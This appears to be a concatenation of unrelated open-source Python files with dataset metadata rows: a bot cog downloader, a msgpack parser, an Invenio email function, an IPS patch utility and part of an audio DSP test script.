if os.path.exists(cog_data_path):
print("Copying {}'s data folder...".format(cog))
copy_tree(cog_data_path, "data/" + cog)
return True
def list_cogs(self):
dirs = [d for d in os.listdir(self.path) if os.path.exists(self.path + d)]
return dirs
def update_repo(self):
if not os.path.exists("data/downloader"):
print("Downloading cogs repo...")
call(["git", "clone", "https://github.com/Twentysix26/Red-Cogs.git", "data/downloader"]) # It's blocking but it shouldn't matter
else:
Popen(["git", "-C", "data/downloader", "pull", "-q"])
def setup(bot):
n = Downloader(bot)
n.update_repo()
bot.add_cog(n) | gpl-3.0 | 4,744,360,861,402,750,000 | 40.598639 | 153 | 0.570985 | false |
arizvisa/syringe | template/protocol/mp.py | 1 | 13773 | import ptypes
from ptypes import *
ptypes.setbyteorder(ptypes.config.byteorder.bigendian)
### definitions
class bit0(ptype.definition): cache = {}
class bit1(ptype.definition): cache = {}
class bit2container(ptype.definition): cache = {}
class bit2msgtype(ptype.definition): cache = {}
class bit3arraymap(ptype.definition): cache = {}
class d_packet(ptype.definition): cache = {}
### packet
class packet(pstruct.type):
_fields_ = [
(lambda s: t_packet, 'type'),
(lambda s: d_packet.lookup(s['type'].li.PackedType()), 'data'),
]
def packedValue(self):
return self['type'].PackedValue()
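# Usage sketch (illustrative, mirroring the __main__ block at the bottom of
# this module): decode one msgpack value from raw bytes; b'\xa3abc' encodes
# the fixstr "abc".
#   pkt = packet(source=ptypes.prov.string(b'\xa3abc')).l
#   pkt['type'].PackedType()    # -> 0b10100000 (fixstr)
#   pkt['data']['Value'].str()  # -> 'abc'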
class t_packet(pbinary.struct):
def __value(self):
return bit0.lookup(self['otherQ'])
_fields_ = [
(1, 'otherQ'),
(__value, 'value'),
]
def PackedType(self):
'''Return the msgpack type-id for the packet.'''
return self.__field__('value').PackedType()
def PackedValue(self):
'''Return the integer value encoded within the type field of the packet.'''
return self.__field__('value').PackedValue()
def summary(self):
res = d_packet.lookup(self.PackedType())
return '{:s} {:s}'.format(res.typename(), super(t_packet,self).summary())
## first bit : positive-fixint or other
@bit0.define
class t_positive_fixint(pbinary.integer):
type = 0
def blockbits(self): return 7
def PackedType(self): return 0b00000000
def PackedValue(self): return self.int()
@bit0.define
class t_fixother(pbinary.struct):
type = 1
def __value(self):
return bit1.lookup(self['groupQ'])
_fields_ = [
(1, 'groupQ'),
(__value, 'value'),
]
def PackedType(self): return self.__field__('value').PackedType()
def PackedValue(self): return self.__field__('value').PackedValue()
## second bit : container or group
@bit1.define
class t_1fixcontainer(pbinary.struct):
type = 0
def __value(self):
return bit2container.lookup(self['strQ'])
_fields_ = [
(1, 'strQ'),
(__value, 'value'),
]
def PackedType(self): return self.__field__('value').PackedType()
def PackedValue(self): return self.__field__('value').PackedValue()
@bit1.define
class t_fixgroup(pbinary.struct):
type = 1
def __value(self):
return bit2msgtype.lookup(self['negative-fixintQ'])
_fields_ = [
(1, 'negative-fixintQ'),
(__value, 'value'),
]
def PackedType(self): return self.__field__('value').PackedType()
def PackedValue(self): return self.__field__('value').PackedValue()
## third bit : str or array/map
@bit2container.define
class t_fixstr(pbinary.integer):
type = 1
def blockbits(self): return 5
def PackedType(self): return 0b10100000
def PackedValue(self): return self.int()
@bit2container.define
class t_2fixcontainer(pbinary.struct):
type = 0
def __container(self):
return bit3arraymap.lookup(self['arrayQ'])
_fields_ = [
(1, 'arrayQ'),
(__container, 'value'),
]
def PackedType(self): return self.__field__('value').PackedType()
def PackedValue(self): return self.__field__('value').PackedValue()
## fourth bit: array or map
@bit3arraymap.define
class t_fixmap(pbinary.integer):
type = 0
def blockbits(self): return 4
def PackedType(self): return 0b10000000
def PackedValue(self): return self.int()
@bit3arraymap.define
class t_fixarray(pbinary.integer):
type = 1
def blockbits(self): return 4
def PackedType(self): return 0b10010000
def PackedValue(self): return self.int()
## third bit : negative-fixint or messagetype
@bit2msgtype.define
class t_negative_fixint(pbinary.integer):
type = 1
def blockbits(self): return 5
def PackedType(self): return 0b11100000
def PackedValue(self): return self.int()
@bit2msgtype.define
class t_message(pbinary.enum):
type, length = 0, 5
def PackedType(self): return (0b11 << 6) | self.int()
def PackedValue(self): raise NotImplementedError
_values_ = [
('nil', 0b00000),
('(neverused)', 0b00001),
('false', 0b00010),
('true', 0b00011),
('bin8', 0b00100),
('bin16', 0b00101),
('bin32', 0b00110),
('ext8', 0b00111),
('ext16', 0b01000),
('ext32', 0b01001),
('float32', 0b01010),
('float64', 0b01011),
('uint8', 0b01100),
('uint16', 0b01101),
('uint32', 0b01110),
('uint64', 0b01111),
('int8', 0b10000),
('int16', 0b10001),
('int32', 0b10010),
('int64', 0b10011),
('fixext1', 0b10100),
('fixext2', 0b10101),
('fixext4', 0b10110),
('fixext8', 0b10111),
('fixext16', 0b11000),
('str8', 0b11001),
('str16', 0b11010),
('str32', 0b11011),
('array16', 0b11100),
('array32', 0b11101),
('map16', 0b11110),
('map32', 0b11111),
]
### Message data types
class summaryStructure(pstruct.type):
def summary(self):
if len(self._fields_) > 1:
return super(summaryStructure, self).summary()
res = ('{:s}={:s}'.format(k, self[k].summary()) for _, k in self._fields_)
return '{{{:s}}}'.format(', '.join(res))
class ConstantHolder(ptype.block):
constant = None
def get(self):
return None
def set(self, value):
raise NotImplementedError
class PackedIntegerHolder(pint.uint_t):
def get(self):
return self.getparent(packet).packedValue()
def summary(self):
return '{integer:d} ({integer:+#x})'.format(integer=self.get())
def set(self, value):
pkt = self.getparent(packet)
leafs = pkt['type'].traverse(edges=lambda self: self.value, filter=lambda self: isinstance(self, pbinary.type) and self.bits() > 1)
res = list(leafs)[-1]
if res.name() != 'value':
raise AssertionError
return res.set(value)
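# Worked byte examples (illustrative) of how a leading byte is dispatched to a
# d_* structure below via PackedType():
#   0x07 -> positive fixint, PackedType 0b00000000, value 7    (d_positive_fixint)
#   0xa3 -> fixstr of length 3, PackedType 0b10100000          (d_fixstr)
#   0xcc -> uint8 marker, PackedType 0b11001100                (d_uint8)
#   0xe5 -> negative fixint, PackedType 0b11100000, value -27  (d_negative_fixint)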
@d_packet.define
class d_nil(summaryStructure):
type = 0b11000000
class _ConstantHolderNone(ConstantHolder): constant = None
_fields_ = [(_ConstantHolderNone, 'Value')]
@d_packet.define
class d_true(summaryStructure):
    type = 0b11000011  # msgpack 'true' marker (0xc3)
class _ConstantHolderTrue(ConstantHolder): constant = True
_fields_ = [(_ConstantHolderTrue, 'Value')]
@d_packet.define
class d_false(summaryStructure):
    type = 0b11000010  # msgpack 'false' marker (0xc2)
class _ConstantHolderFalse(ConstantHolder): constant = False
_fields_ = [(_ConstantHolderFalse, 'Value')]
@d_packet.define
class d_positive_fixint(summaryStructure):
type = 0b00000000
_fields_ = [(PackedIntegerHolder, 'Value')]
@d_packet.define
class d_negative_fixint(summaryStructure):
type = 0b11100000
class _PackedSignedIntegerHolder(PackedIntegerHolder):
def get(self):
return -0x20 + super(d_negative_fixint._PackedSignedIntegerHolder, self).get()
_fields_ = [(_PackedSignedIntegerHolder, 'Value')]
@d_packet.define
class d_uint8(summaryStructure):
type = 0b11001100
_fields_ = [(pint.uint8_t,'Value')]
@d_packet.define
class d_uint16(summaryStructure):
type = 0b11001101
_fields_ = [(pint.uint16_t,'Value')]
@d_packet.define
class d_uint32(summaryStructure):
type = 0b11001110
_fields_ = [(pint.uint32_t,'Value')]
@d_packet.define
class d_uint64(summaryStructure):
type = 0b11001111
_fields_ = [(pint.uint64_t,'Value')]
@d_packet.define
class d_int8(summaryStructure):
type = 0b11010000
_fields_ = [(pint.int8_t,'Value')]
@d_packet.define
class d_int16(pstruct.type):
type = 0b11010001
_fields_ = [(pint.int16_t,'Value')]
@d_packet.define
class d_int32(pstruct.type):
type = 0b11010010
_fields_ = [(pint.int32_t,'Value')]
@d_packet.define
class d_int64(pstruct.type):
type = 0b11010011
_fields_ = [(pint.int64_t,'Value')]
@d_packet.define
class d_float32(pstruct.type):
type = 0b11001010
_fields_ = [(pfloat.single,'Value')]
@d_packet.define
class d_float64(pstruct.type):
type = 0b11001011
_fields_ = [(pfloat.double,'Value')]
@d_packet.define
class d_fixstr(summaryStructure):
type = 0b10100000
_fields_ = [
(PackedIntegerHolder, 'Length'),
(lambda s: dyn.clone(pstr.string, length=s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_str8(summaryStructure):
type = 0b11011001
_fields_ = [
(pint.uint8_t, 'Length'),
(lambda s: dyn.clone(pstr.string, length=s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_str16(summaryStructure):
type = 0b11011010
_fields_ = [
(pint.uint16_t, 'Length'),
(lambda s: dyn.clone(pstr.string, length=s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_str32(summaryStructure):
type = 0b11011011
_fields_ = [
(pint.uint32_t, 'Length'),
(lambda s: dyn.clone(pstr.string, length=s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_bin8(summaryStructure):
type = 0b11000100
_fields_ = [
(pint.uint8_t, 'Length'),
(lambda s: dyn.block(s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_bin16(summaryStructure):
type = 0b11000101
_fields_ = [
(pint.uint16_t, 'Length'),
(lambda s: dyn.block(s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_bin32(summaryStructure):
type = 0b11000110
_fields_ = [
(pint.uint32_t, 'Length'),
(lambda s: dyn.block(s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_fixarray(summaryStructure):
type = 0b10010000
_fields_ = [
(PackedIntegerHolder, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_array16(summaryStructure):
type = 0b11011100
_fields_ = [
(pint.uint16_t, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_array32(summaryStructure):
type = 0b11011101
_fields_ = [
(pint.uint32_t, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_fixmap(summaryStructure):
type = 0b10000000
_fields_ = [
(PackedIntegerHolder, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()*2), 'Value'),
]
def Data(self):
p = self.getparent(packet)
return p['type'].PackedValue()
@d_packet.define
class d_map16(summaryStructure):
type = 0b11011110
_fields_ = [
(pint.uint16_t, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()*2), 'Value'),
]
@d_packet.define
class d_map32(summaryStructure):
type = 0b11011111
_fields_ = [
(pint.uint32_t, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()*2), 'Value'),
]
@d_packet.define
class d_fixext1(summaryStructure):
type = 0b11010100
_fields_ = [
(pint.sint8_t, 'Type'),
(dyn.array(pint.uint8_t, 1), 'Value'),
]
@d_packet.define
class d_fixext2(summaryStructure):
type = 0b11010101
_fields_ = [
(pint.sint8_t, 'Type'),
(dyn.array(pint.uint8_t, 2), 'Value'),
]
@d_packet.define
class d_fixext4(summaryStructure):
type = 0b11010110
_fields_ = [
(pint.sint8_t, 'Type'),
(dyn.array(pint.uint8_t, 4), 'Value'),
]
@d_packet.define
class d_fixext8(summaryStructure):
type = 0b11010111
_fields_ = [
(pint.sint8_t, 'Type'),
(dyn.array(pint.uint8_t, 8), 'Value'),
]
@d_packet.define
class d_fixext16(summaryStructure):
type = 0b11011000
_fields_ = [
(pint.sint8_t, 'Type'),
(dyn.array(pint.uint8_t, 16), 'Value'),
]
@d_packet.define
class d_ext8(summaryStructure):
type = 0b11000111
_fields_ = [(pint.uint8_t, 'Value'), (pint.sint8_t, 'Type')]
@d_packet.define
class d_ext16(summaryStructure):
type = 0b11001000
_fields_ = [(pint.uint16_t, 'Value'), (pint.sint8_t, 'Type')]
@d_packet.define
class d_ext32(summaryStructure):
type = 0b11001001
_fields_ = [(pint.uint32_t, 'Value'), (pint.sint8_t, 'Type')]
if __name__ == '__main__':
import types
import operator,functools,itertools
res = [130,196,4,116,121,112,101,196,7,119,111,114,107,101,114,115, 196,4,100,97,116,97,145,130,196,8,119,111,114,107,101,114,105,100, 196,5,115,116,100,46,49,196,5,115,108,111,116,115,160]
res = str().join(map(chr,res))
# https://github.com/msgpack/msgpack-python/blob/master/test/test_format.py
#res = b"\x96" b"\xde\x00\x00" b"\xde\x00\x01\xc0\xc2" b"\xde\x00\x02\xc0\xc2\xc3\xc2" b"\xdf\x00\x00\x00\x00" b"\xdf\x00\x00\x00\x01\xc0\xc2" b"\xdf\x00\x00\x00\x02\xc0\xc2\xc3\xc2"
_fixnum = res = b"\x92\x93\x00\x40\x7f\x93\xe0\xf0\xff"
_fixarray = res = b"\x92\x90\x91\x91\xc0"
_fixraw = res = b"\x94\xa0\xa1a\xa2bc\xa3def"
_fixmap = res = b"\x82\xc2\x81\xc0\xc0\xc3\x81\xc0\x80"
_unsignedint = res = b"\x99\xcc\x00\xcc\x80\xcc\xff\xcd\x00\x00\xcd\x80\x00" b"\xcd\xff\xff\xce\x00\x00\x00\x00\xce\x80\x00\x00\x00" b"\xce\xff\xff\xff\xff"
_signedint = res = b"\x99\xd0\x00\xd0\x80\xd0\xff\xd1\x00\x00\xd1\x80\x00" b"\xd1\xff\xff\xd2\x00\x00\x00\x00\xd2\x80\x00\x00\x00" b"\xd2\xff\xff\xff\xff"
_raw = res = b"\x96\xda\x00\x00\xda\x00\x01a\xda\x00\x02ab\xdb\x00\x00" b"\x00\x00\xdb\x00\x00\x00\x01a\xdb\x00\x00\x00\x02ab"
_array = res = b"\x96\xdc\x00\x00\xdc\x00\x01\xc0\xdc\x00\x02\xc2\xc3\xdd\x00" b"\x00\x00\x00\xdd\x00\x00\x00\x01\xc0\xdd\x00\x00\x00\x02" b"\xc2\xc3"
_map = res = b"\x96" b"\xde\x00\x00" b"\xde\x00\x01\xc0\xc2" b"\xde\x00\x02\xc0\xc2\xc3\xc2" b"\xdf\x00\x00\x00\x00" b"\xdf\x00\x00\x00\x01\xc0\xc2" b"\xdf\x00\x00\x00\x02\xc0\xc2\xc3\xc2"
x = packet(source=ptypes.prov.string(res))
x=x.l
| bsd-2-clause | -6,107,569,118,676,119,000 | 30.808314 | 193 | 0.618819 | false |
lbjay/cds-invenio | modules/websubmit/lib/functions/Send_Request_For_Refereeing_Process.py | 1 | 4816 | ## This file is part of CDS Invenio.
## Copyright (C) 2002, 2003, 2004, 2005, 2006, 2007, 2008 CERN.
##
## CDS Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## CDS Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with CDS Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
## Description: function Send_Request_For_Refereeing_Process
## This function sends an email to the publication committee chair
## asking him/her to select an editorial board for a document
## Author: T.Baron
## PARAMETERS: directory: parameter to the link manager program
## addressesDAM: address of the referee(s)
## categformatDAM: variable needed to extract the category
## of the document and use it to derive the
## address.
## authorfile: name of the file containing the author list
## titleFile: name of the file containing the title
import os
import re
from invenio.config import \
CFG_SITE_NAME, \
CFG_SITE_URL, \
CFG_SITE_SUPPORT_EMAIL
from invenio.access_control_admin import acc_get_role_users,acc_get_role_id
from invenio.websubmit_config import CFG_WEBSUBMIT_COPY_MAILS_TO_ADMIN
from invenio.mailutils import send_email
def Send_Request_For_Refereeing_Process(parameters, curdir, form, user_info=None):
global rn,sysno
# variables declaration
doctype = re.search(".*/([^/]*)/([^/]*)/[^/]*$",curdir).group(2)
FROMADDR = '%s Submission Engine <%s>' % (CFG_SITE_NAME,CFG_SITE_SUPPORT_EMAIL)
otheraddresses = parameters['addressesDAM']
categformat = parameters['categformatDAM']
# retrieve category
categformat = categformat.replace("<CATEG>","([^-]*)")
categs = re.match(categformat,rn)
if categs is not None:
category = categs.group(1)
else:
category = "unknown"
# create TI
if os.path.exists("%s/date" % curdir):
fp = open("%s/date" % curdir, "r")
date = fp.read()
fp.close()
else:
date = ""
if os.path.exists("%s/%s" % (curdir,parameters['titleFile'])):
fp = open("%s/%s" % (curdir,parameters['titleFile']),"r")
title = fp.read()
fp.close()
title = title.replace("\n","")
else:
title = ""
title += " - %s" % date
# create AU
if os.path.exists("%s/%s" % (curdir,parameters['authorfile'])):
fp = open("%s/%s" % (curdir,parameters['authorfile']), "r")
author = fp.read()
fp.close()
else:
author = ""
# we get the referee password
#sth = run_sql("SELECT access FROM sbmAPPROVAL WHERE rn=%s", (rn,))
#if len(sth) >0:
#access = sth[0][0]
# Build referee's email address
refereeaddress = ""
# Try to retrieve the publication committee chair's email from the role database
for user in acc_get_role_users(acc_get_role_id("pubcomchair_%s_%s" % (doctype,category))):
refereeaddress += user[1] + ","
# And if there are general referees
for user in acc_get_role_users(acc_get_role_id("pubcomchair_%s_*" % doctype)):
refereeaddress += user[1] + ","
refereeaddress = re.sub(",$","",refereeaddress)
# Creation of the mail for the referee
addresses = ""
if refereeaddress != "":
addresses = refereeaddress + ","
if otheraddresses != "":
addresses += otheraddresses
else:
addresses = re.sub(",$","",addresses)
title_referee = "Request for refereeing process of %s" % rn
mail_referee = "The document %s has been asked for refereing process to the %s Server..\nYour have to select an editorial board for it.\n\n" % (rn,CFG_SITE_NAME)
mail_referee +="Title: %s\n\nAuthor(s): %s\n\n" % (title,author)
mail_referee +="To access the document(s), select the file(s) from the location:<%s/record/%s/files/>\n\n" % (CFG_SITE_URL,sysno)
mail_referee +="To select an editorial board, you should go to this URL:\n<%s/publiline.py?doctype=%s&categ=%s&RN=%s>\n" % (CFG_SITE_URL,doctype,category,rn)
mail_referee +="---------------------------------------------\nBest regards.\nThe submission team.\n"
#Send mail to referee
send_email(FROMADDR, addresses, title_referee, mail_referee, copy_to_admin=CFG_WEBSUBMIT_COPY_MAILS_TO_ADMIN)
return ""
| gpl-2.0 | 4,204,461,003,099,882,000 | 44.433962 | 165 | 0.630606 | false |
theonlydude/RandomMetroidSolver | rom/ips.py | 1 | 10520 | import itertools
from utils.utils import range_union
# adapted from ips-util for python 3.2 (https://pypi.org/project/ips-util/)
class IPS_Patch(object):
def __init__(self, patchDict=None):
self.records = []
self.truncate_length = None
self.max_size = 0
if patchDict is not None:
for addr, data in patchDict.items():
byteData = bytearray(data)
self.add_record(addr, byteData)
def toDict(self):
ret = {}
for record in self.records:
if 'rle_count' in record:
ret[record['address']] = [int.from_bytes(record['data'],'little')]*record['rle_count']
else:
ret[record['address']] = [int(b) for b in record['data']]
return ret
@staticmethod
def load(filename):
loaded_patch = IPS_Patch()
with open(filename, 'rb') as file:
header = file.read(5)
if header != b'PATCH':
raise Exception('Not a valid IPS patch file!')
while True:
address_bytes = file.read(3)
if address_bytes == b'EOF':
break
address = int.from_bytes(address_bytes, byteorder='big')
length = int.from_bytes(file.read(2), byteorder='big')
rle_count = 0
if length == 0:
rle_count = int.from_bytes(file.read(2), byteorder='big')
length = 1
data = file.read(length)
if rle_count > 0:
loaded_patch.add_rle_record(address, data, rle_count)
else:
loaded_patch.add_record(address, data)
truncate_bytes = file.read(3)
if len(truncate_bytes) == 3:
loaded_patch.set_truncate_length(int.from_bytes(truncate_bytes, byteorder='big'))
return loaded_patch
@staticmethod
def create(original_data, patched_data):
# The heuristics for optimizing a patch were chosen with reference to
# the source code of Flips: https://github.com/Alcaro/Flips
patch = IPS_Patch()
run_in_progress = False
current_run_start = 0
current_run_data = bytearray()
runs = []
if len(original_data) > len(patched_data):
patch.set_truncate_length(len(patched_data))
original_data = original_data[:len(patched_data)]
elif len(original_data) < len(patched_data):
original_data += bytes([0] * (len(patched_data) - len(original_data)))
if original_data[-1] == 0 and patched_data[-1] == 0:
patch.add_record(len(patched_data) - 1, bytes([0]))
for index, (original, patched) in enumerate(zip(original_data, patched_data)):
if not run_in_progress:
if original != patched:
run_in_progress = True
current_run_start = index
current_run_data = bytearray([patched])
else:
if original == patched:
runs.append((current_run_start, current_run_data))
run_in_progress = False
else:
current_run_data.append(patched)
if run_in_progress:
runs.append((current_run_start, current_run_data))
for start, data in runs:
if start == int.from_bytes(b'EOF', byteorder='big'):
start -= 1
data = bytes([patched_data[start - 1]]) + data
grouped_byte_data = list([
{'val': key, 'count': sum(1 for _ in group), 'is_last': False}
for key,group in itertools.groupby(data)
])
grouped_byte_data[-1]['is_last'] = True
record_in_progress = bytearray()
pos = start
for group in grouped_byte_data:
if len(record_in_progress) > 0:
# We don't want to interrupt a record in progress with a new header unless
# this group is longer than two complete headers.
if group['count'] > 13:
patch.add_record(pos, record_in_progress)
pos += len(record_in_progress)
record_in_progress = bytearray()
patch.add_rle_record(pos, bytes([group['val']]), group['count'])
pos += group['count']
else:
record_in_progress += bytes([group['val']] * group['count'])
elif (group['count'] > 3 and group['is_last']) or group['count'] > 8:
# We benefit from making this an RLE record if the length is at least 8,
# or the length is at least 3 and we know it to be the last part of this diff.
# Make sure not to overflow the maximum length. Split it up if necessary.
remaining_length = group['count']
while remaining_length > 0xffff:
patch.add_rle_record(pos, bytes([group['val']]), 0xffff)
remaining_length -= 0xffff
pos += 0xffff
patch.add_rle_record(pos, bytes([group['val']]), remaining_length)
pos += remaining_length
else:
# Just begin a new standard record.
record_in_progress += bytes([group['val']] * group['count'])
if len(record_in_progress) > 0xffff:
patch.add_record(pos, record_in_progress[:0xffff])
record_in_progress = record_in_progress[0xffff:]
pos += 0xffff
# Finalize any record still in progress.
if len(record_in_progress) > 0:
patch.add_record(pos, record_in_progress)
return patch
def add_record(self, address, data):
if address == int.from_bytes(b'EOF', byteorder='big'):
raise RuntimeError('Start address {0:x} is invalid in the IPS format. Please shift your starting address back by one byte to avoid it.'.format(address))
if address > 0xffffff:
raise RuntimeError('Start address {0:x} is too large for the IPS format. Addresses must fit into 3 bytes.'.format(address))
if len(data) > 0xffff:
raise RuntimeError('Record with length {0} is too large for the IPS format. Records must be less than 65536 bytes.'.format(len(data)))
if len(data) == 0: # ignore empty records
return
record = {'address': address, 'data': data, 'size':len(data)}
self.appendRecord(record)
def add_rle_record(self, address, data, count):
if address == int.from_bytes(b'EOF', byteorder='big'):
raise RuntimeError('Start address {0:x} is invalid in the IPS format. Please shift your starting address back by one byte to avoid it.'.format(address))
if address > 0xffffff:
raise RuntimeError('Start address {0:x} is too large for the IPS format. Addresses must fit into 3 bytes.'.format(address))
if count > 0xffff:
raise RuntimeError('RLE record with length {0} is too large for the IPS format. RLE records must be less than 65536 bytes.'.format(count))
if len(data) != 1:
raise RuntimeError('Data for RLE record must be exactly one byte! Received {0}.'.format(data))
record = {'address': address, 'data': data, 'rle_count': count, 'size': count}
self.appendRecord(record)
def appendRecord(self, record):
sz = record['address'] + record['size']
if sz > self.max_size:
self.max_size = sz
self.records.append(record)
def set_truncate_length(self, truncate_length):
self.truncate_length = truncate_length
def encode(self):
encoded_bytes = bytearray()
encoded_bytes += 'PATCH'.encode('ascii')
for record in self.records:
encoded_bytes += record['address'].to_bytes(3, byteorder='big')
if 'rle_count' in record:
encoded_bytes += (0).to_bytes(2, byteorder='big')
encoded_bytes += record['rle_count'].to_bytes(2, byteorder='big')
else:
encoded_bytes += len(record['data']).to_bytes(2, byteorder='big')
encoded_bytes += record['data']
encoded_bytes += 'EOF'.encode('ascii')
if self.truncate_length is not None:
encoded_bytes += self.truncate_length.to_bytes(3, byteorder='big')
return encoded_bytes
# save patch into IPS file
def save(self, path):
with open(path, 'wb') as ipsFile:
ipsFile.write(self.encode())
# applies patch on an existing bytearray
def apply(self, in_data):
out_data = bytearray(in_data)
for record in self.records:
if record['address'] >= len(out_data):
out_data += bytes([0] * (record['address'] - len(out_data) + 1))
if 'rle_count' in record:
out_data[record['address'] : record['address'] + record['rle_count']] = b''.join([record['data']] * record['rle_count'])
else:
out_data[record['address'] : record['address'] + len(record['data'])] = record['data']
if self.truncate_length is not None:
out_data = out_data[:self.truncate_length]
return out_data
# applies patch on an opened file
def applyFile(self, handle):
for record in self.records:
handle.seek(record['address'])
if 'rle_count' in record:
handle.write(bytearray(b'').join([record['data']]) * record['rle_count'])
else:
handle.write(record['data'])
# appends an IPS_Patch on top of this one
def append(self, patch):
if patch.truncate_length is not None and (self.truncate_length is None or patch.truncate_length > self.truncate_length):
self.set_truncate_length(patch.truncate_length)
for record in patch.records:
if record['size'] > 0: # ignore empty records
self.appendRecord(record)
# gets address ranges written to by this patch
def getRanges(self):
def getRange(record):
return range(record['address'], record['address']+record['size'])
return range_union([getRange(record) for record in self.records])
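# Usage sketch (illustrative, not part of the original module): diff two byte
# strings into a patch, apply it and check the round trip. The sample data is
# an assumption for demonstration purposes only.
if __name__ == '__main__':
    _original = bytes(bytearray(16))            # sixteen zero bytes
    _patched = bytearray(_original)
    _patched[4:8] = b'\xde\xad\xbe\xef'         # change four bytes in the middle
    _patch = IPS_Patch.create(_original, bytes(_patched))
    assert _patch.apply(_original) == _patched  # apply() returns a bytearray
    print(len(_patch.encode()))                 # size of the 'PATCH'...'EOF' payload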
| gpl-3.0 | 8,996,946,439,968,728,000 | 42.114754 | 164 | 0.552471 | false |
ojg/jack-qdsp | tests/runtest.py | 1 | 7336 | #!/usr/bin/env python
from numpy import *
import os as os
from scikits import audiolab
from scipy import signal
import sys
def writeaudio(data, filename='test_in.wav'):
audiolab.wavwrite(data, filename, 48000, 'float32')
def readaudio():
return audiolab.wavread("test_out.wav")[0]
def compareaudio(data1, data2, threshold=1e-7):
if (abs(data1 - data2) > threshold).any():
maxdev = amax(abs(data1 - data2))
print "Fail %f" % maxdev
print hstack([data1, data2])
quit()
else:
print "Pass"
def test_gain():
print "Testing dsp-gain"
#generate test input
ref = linspace(-1, 1, 200)
writeaudio(ref)
#create reference output
expected = ref*(10**(-1.0/20))
#run file-qdsp
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p gain,g=-1")
#compare results
compareaudio(expected, readaudio())
expected = concatenate((zeros(48), ref[0:-48]))
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p gain,d=0.001")
compareaudio(expected, readaudio())
expected = concatenate((zeros(96), ref[0:-96]))
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p gain,d=0.002")
compareaudio(expected, readaudio())
expected = minimum(maximum(ref * -0.3, -(10**(-20.0/20))), (10**(-20.0/20)))
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p gain,gl=-0.3,t=-20")
compareaudio(expected, readaudio())
def test_gate():
print "Testing dsp-gate"
ref = linspace(-0.25, 0.25, 200)
writeaudio(ref)
# test open gate
expected = ref # * array((zeros(50), ones(100), zeros(50))
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p gate,t=-120")
compareaudio(expected, readaudio())
#test closing gate with zero hold
expected = ref * concatenate((ones(64), linspace(1,0,64), zeros(72)))
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p gate,t=-6")
compareaudio(expected, readaudio(), 2e-7)
#test closing gate with hold
expected = ref * concatenate((ones(64), ones(64), linspace(1,0,64), zeros(8)))
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p gate,t=-6,h=0.003")
compareaudio(expected, readaudio(), 2e-7)
#test closing and opening gate with zero hold
ref = linspace(-0.25, 1, 256)
writeaudio(ref)
expected = ref * concatenate((ones(64), linspace(1,0,64), zeros(64), linspace(0,1,64)))
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p gate,t=-6")
compareaudio(expected, readaudio(), 2e-7)
#test closing and opening gate with hold
ref = linspace(-0.25, 1, 384)
writeaudio(ref)
expected = ref * concatenate((ones(64), ones(64), linspace(1,0,64), zeros(64), linspace(0,1,64), ones(64)))
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p gate,t=-6,h=0.003")
compareaudio(expected, readaudio(), 2e-7)
def test_iir():
print "Testing dsp-iir"
ref = (2.0 * random.rand(512)) - 1.0
writeaudio(ref)
#test LP2 mono
b, a = signal.butter(2, 100.0/24000, 'low')
expected = signal.lfilter(b,a,ref)
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p iir,lp2,f=100,q=0.7071")
compareaudio(expected, readaudio(), 1e-6)
#test HP2 with gain
b, a = signal.butter(2, 100.0/24000, 'high')
expected = signal.lfilter(b,a,ref*10**(-6.0/20))
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p iir,hp2,f=100,q=0.7071,g=-6")
compareaudio(expected, readaudio(), 1e-6)
#test HP2 stereo
writeaudio(transpose([ref,-ref]))
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p iir,hp2,f=100,q=0.7071,g=-6")
compareaudio(transpose([expected, -expected]), readaudio(), 1e-6)
def test_fir():
print "Testing dsp-fir"
#ref = ones(512)
ref = (2.0 * random.rand(512)) - 1.0
#test short mono fir
writeaudio(ref)
h = signal.firwin(21, 0.4)
savetxt("test_coeffs.txt", h)
expected = signal.lfilter(h, 1, ref)
writeaudio(expected, 'expected.wav')
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p fir,h=test_coeffs.txt")
compareaudio(expected, readaudio(), 1e-6)
#test long mono fir
writeaudio(ref)
h = signal.firwin(312, 0.4)
savetxt("test_coeffs.txt", h)
expected = signal.lfilter(h, 1, ref)
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p fir,h=test_coeffs.txt")
compareaudio(expected, readaudio(), 1e-6)
#test short stereo fir, mono coeffs
writeaudio(transpose([ref,-ref]))
h = signal.firwin(21, 0.4)
savetxt("test_coeffs.txt", h)
expected = signal.lfilter(h, 1, ref)
os.system("../file-qdsp -n 64 -i test_in.wav -o test_out.wav -p fir,h=test_coeffs.txt")
